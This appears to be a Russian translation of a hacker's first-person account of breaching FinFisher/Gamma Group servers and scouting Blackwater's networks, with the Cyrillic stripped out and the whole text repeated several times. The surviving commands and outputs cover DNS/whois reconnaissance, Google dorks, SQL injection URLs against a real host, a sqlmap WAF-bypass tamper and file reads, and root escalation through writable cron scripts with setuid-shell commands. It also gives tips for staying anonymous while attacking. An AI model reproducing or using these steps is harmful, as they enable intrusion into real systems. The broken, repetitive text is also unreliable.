: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
